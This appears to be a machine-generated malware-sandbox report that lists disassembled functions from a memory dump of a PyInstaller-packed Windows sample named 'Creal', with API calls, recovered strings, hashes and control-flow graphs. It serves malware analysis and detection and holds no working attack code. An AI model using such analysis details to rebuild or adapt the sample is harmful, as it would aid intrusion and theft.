                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                        • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                        • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                        • Instruction ID: 171a3e1c5694dc4e9508cc8447d0f7a4170881ef5584123bc21729e3034b797d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E641EF21B3AA0251FA55DF16AA0067D2295BF49BB0F88913BDD1DD7798EE3CE865C300
                                                                                                                                                                                                                                                        Function 00007FF6D92436B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF6D9243804), ref: 00007FF6D92436E1
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D9243804), ref: 00007FF6D92436EB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9243706,?,00007FF6D9243804), ref: 00007FF6D9242C9E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9243706,?,00007FF6D9243804), ref: 00007FF6D9242D63
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242C50: MessageBoxW.USER32 ref: 00007FF6D9242D99
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                        • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                        • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction ID: 7af964d9428004d4d5952aa804a10e16b7ad84caec0c6daa75e113e5628370d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86213061B2864241FA21FF25EA153BE2250BFAC754F404237D69DC69D5EE2CE624CB40
                                                                                                                                                                                                                                                        Function 00007FF6D925BA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 901 7ff6d925ba5c-7ff6d925ba82 902 7ff6d925ba9d-7ff6d925baa1 901->902 903 7ff6d925ba84-7ff6d925ba98 call 7ff6d9254ee8 call 7ff6d9254f08 901->903 905 7ff6d925be77-7ff6d925be83 call 7ff6d9254ee8 call 7ff6d9254f08 902->905 906 7ff6d925baa7-7ff6d925baae 902->906 921 7ff6d925be8e 903->921 923 7ff6d925be89 call 7ff6d925a8e0 905->923 906->905 908 7ff6d925bab4-7ff6d925bae2 906->908 908->905 911 7ff6d925bae8-7ff6d925baef 908->911 915 7ff6d925bb08-7ff6d925bb0b 911->915 916 7ff6d925baf1-7ff6d925bb03 call 7ff6d9254ee8 call 7ff6d9254f08 911->916 919 7ff6d925be73-7ff6d925be75 915->919 920 7ff6d925bb11-7ff6d925bb17 915->920 916->923 924 7ff6d925be91-7ff6d925bea8 919->924 920->919 925 7ff6d925bb1d-7ff6d925bb20 920->925 921->924 923->921 925->916 928 7ff6d925bb22-7ff6d925bb47 925->928 930 7ff6d925bb7a-7ff6d925bb81 928->930 931 7ff6d925bb49-7ff6d925bb4b 928->931 932 7ff6d925bb56-7ff6d925bb6d call 7ff6d9254ee8 call 7ff6d9254f08 call 7ff6d925a8e0 930->932 933 7ff6d925bb83-7ff6d925bbab call 7ff6d925d5fc call 7ff6d925a948 * 2 930->933 934 7ff6d925bb4d-7ff6d925bb54 931->934 935 7ff6d925bb72-7ff6d925bb78 931->935 962 7ff6d925bd00 932->962 964 7ff6d925bbad-7ff6d925bbc3 call 7ff6d9254f08 call 7ff6d9254ee8 933->964 965 7ff6d925bbc8-7ff6d925bbf3 call 7ff6d925c284 933->965 934->932 934->935 936 7ff6d925bbf8-7ff6d925bc0f 935->936 939 7ff6d925bc8a-7ff6d925bc94 call 7ff6d926391c 936->939 940 7ff6d925bc11-7ff6d925bc19 936->940 953 7ff6d925bc9a-7ff6d925bcaf 939->953 954 7ff6d925bd1e 939->954 940->939 943 7ff6d925bc1b-7ff6d925bc1d 940->943 943->939 947 7ff6d925bc1f-7ff6d925bc35 943->947 947->939 951 7ff6d925bc37-7ff6d925bc43 947->951 951->939 958 7ff6d925bc45-7ff6d925bc47 951->958 953->954 956 7ff6d925bcb1-7ff6d925bcc3 GetConsoleMode 953->956 960 7ff6d925bd23-7ff6d925bd43 ReadFile 954->960 956->954 961 7ff6d925bcc5-7ff6d925bccd 956->961 958->939 963 7ff6d925bc49-7ff6d925bc61 958->963 966 7ff6d925be3d-7ff6d925be46 GetLastError 960->966 967 7ff6d925bd49-7ff6d925bd51 960->967 961->960 969 7ff6d925bccf-7ff6d925bcf1 ReadConsoleW 961->969 972 7ff6d925bd03-7ff6d925bd0d call 7ff6d925a948 962->972 963->939 973 7ff6d925bc63-7ff6d925bc6f 963->973 964->962 965->936 970 7ff6d925be48-7ff6d925be5e call 7ff6d9254f08 call 7ff6d9254ee8 966->970 971 7ff6d925be63-7ff6d925be66 966->971 967->966 975 7ff6d925bd57 967->975 977 7ff6d925bcf3 GetLastError 969->977 978 7ff6d925bd12-7ff6d925bd1c 969->978 970->962 982 7ff6d925be6c-7ff6d925be6e 971->982 983 7ff6d925bcf9-7ff6d925bcfb call 7ff6d9254e7c 971->983 972->924 973->939 981 7ff6d925bc71-7ff6d925bc73 973->981 985 7ff6d925bd5e-7ff6d925bd73 975->985 977->983 978->985 981->939 990 7ff6d925bc75-7ff6d925bc85 981->990 982->972 983->962 985->972 986 7ff6d925bd75-7ff6d925bd80 985->986 992 7ff6d925bda7-7ff6d925bdaf 986->992 993 7ff6d925bd82-7ff6d925bd9b call 7ff6d925b674 986->993 990->939 997 7ff6d925be2b-7ff6d925be38 call 7ff6d925b4b4 992->997 998 7ff6d925bdb1-7ff6d925bdc3 992->998 1001 7ff6d925bda0-7ff6d925bda2 993->1001 997->1001 1002 7ff6d925bdc5 998->1002 1003 7ff6d925be1e-7ff6d925be26 998->1003 1001->972 1005 7ff6d925bdca-7ff6d925bdd1 1002->1005 1003->972 1006 7ff6d925be0d-7ff6d925be18 1005->1006 1007 7ff6d925bdd3-7ff6d925bdd7 1005->1007 1006->1003 1008 7ff6d925bdd9-7ff6d925bde0 1007->1008 1009 7ff6d925bdf3 1007->1009 1008->1009 1010 7ff6d925bde2-7ff6d925bde6 1008->1010 1011 7ff6d925bdf9-7ff6d925be09 1009->1011 1010->1009 1012 7ff6d925bde8-7ff6d925bdf1 1010->1012 1011->1005 1013 7ff6d925be0b 1011->1013 1012->1011 1013->1003
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                                        • Instruction ID: 7e340d9fd1579614a6df1175c9ce18073fb24c3a3d92866361ac2e5e7721bca4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CC1C722A2C68691FBE09F159A442BD7B50FF81B90F594133EA4E837D9DF7CE8658700
                                                                                                                                                                                                                                                        Function 00007FF6D9248570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 995526605-0
                                                                                                                                                                                                                                                        • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                        • Instruction ID: f6b4f96d4b3b1fc2a8f24ac62092457c80de4ce11f261c031b44db1d610995a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 64214431A2C64242FB509F59F64423EA7A0FF957A0F500236EA6D87BE8DFBCD4558B40
                                                                                                                                                                                                                                                        Function 00007FF6D92490E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: GetCurrentProcess.KERNEL32 ref: 00007FF6D9248590
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: OpenProcessToken.ADVAPI32 ref: 00007FF6D92485A3
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: GetTokenInformation.KERNELBASE ref: 00007FF6D92485C8
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: GetLastError.KERNEL32 ref: 00007FF6D92485D2
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: GetTokenInformation.KERNELBASE ref: 00007FF6D9248612
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6D924862E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248570: CloseHandle.KERNEL32 ref: 00007FF6D9248646
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF6D9243C55), ref: 00007FF6D924916C
                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,00007FF6D9243C55), ref: 00007FF6D9249175
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                        • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                        • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                                        • Instruction ID: caf793ac16fa0c9c96fa11aa82ce0c57272d8764d382d2038cf26d7e92f04b8b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47217E21A28B4281F710AF50EA153EE6264FF98780F444033EA4D97B96DF3CD824CB80
                                                                                                                                                                                                                                                        Function 00007FF6D9247E20 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(00000000,?,00007FF6D924352C,?,00000000,00007FF6D9243F23), ref: 00007FF6D9247F32
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                        • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                                        • Instruction ID: 0a1826b3976cf394d6c69a3484333580a0c999f10c71881858e4713a6abe202e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2331A521729AC545FB219F21E9507AE6358EB98BE0F440332EA6D87BC9DE2CD6158B40
                                                                                                                                                                                                                                                        Function 00007FF6D925CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D925CF4B), ref: 00007FF6D925D07C
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D925CF4B), ref: 00007FF6D925D107
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 953036326-0
                                                                                                                                                                                                                                                        • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                        • Instruction ID: a1e8499501d925037dda841dd7d362c930f1f3b4bc394ed19ccfa518782d6e8d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F91A572F2869195F7A0DF6596402BD2BA0BB44B88F54423BDE0ED7E99DF38D462C700
                                                                                                                                                                                                                                                        Function 00007FF6D925F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                                        • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                        • Instruction ID: 6af2f7f143aa3862729983c47c96039319b3155c0cc8c78840c5485e60dcacf7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4551F672F252118AFB58DF649A957FC2B61AF48368F500236DD1E92EE9DF38A412C700
                                                                                                                                                                                                                                                        Function 00007FF6D925577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                                        • Opcode ID: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                                        • Instruction ID: 9880285b5278e1bf631644dff829c656227968ed3b157179f056bfa8be1b0cde
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16517C22E286418AFB90CFB1D6547BD37A1AF48B58F148436DE4D9B68DDF38D4A1C780
                                                                                                                                                                                                                                                        Function 00007FF6D9255628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279662727-0
                                                                                                                                                                                                                                                        • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                                        • Instruction ID: fe44db68a00d0671d3096fea69a0d43f37620bcfbdb4405a9acc409469ed7bc0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72418062E2878283F6908F61965077D7760FF947A4F109336E69C43AD9DF6CE5B08740
                                                                                                                                                                                                                                                        Function 00007FF6D924CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
